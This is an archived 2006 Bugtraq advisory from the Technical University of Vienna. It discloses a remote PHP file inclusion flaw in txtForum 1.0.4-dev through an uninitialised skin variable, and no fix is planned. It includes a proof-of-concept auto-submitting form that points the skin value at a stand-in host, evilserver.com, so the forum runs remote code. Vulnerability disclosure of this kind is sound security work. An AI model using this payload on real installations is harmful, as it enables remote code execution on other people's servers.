lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060309144109.20884.qmail@securityfocus.com>
Date: 9 Mar 2006 14:41:09 -0000
From: enji@...lab.tuwien.ac.at
To: bugtraq@...urityfocus.com
Subject: txtForum: Script Injection Vulnerability


===========================================================
txtForum: Script Injection Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-004, March 9, 2006
===========================================================


Affected applications
----------------------

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.


Description
------------

There is an include statement in the file common.php on line 46 that makes use of the SKIN constant, which was previously defined via the $skin variable. Under the following conditions, an attacker can inject arbitrary PHP script into the application:

- register_globals has to be active
- remote file inclusions have to be allowed

All the attacker has to do is find a path through the program that doesn't initialize the $skin variable. The attacker does not require access to an account in the forum. Here is an example for an attack page:

<form action='http://localhost/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
  document.forms[0].submit();
</script>

This leads to execution of the code in http://evilserver.com/header.tpl. There might be further possibilities for exploits (similar include statements can also be found on lines 53 and 61). 


Solution
---------

There is no solution to this issue yet.

Timeline:

March 2, 2006:
Vulnerability reported to and acknowledged by the developer (I.Konforti).
A fix is not planned.

March 9, 2006:
Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ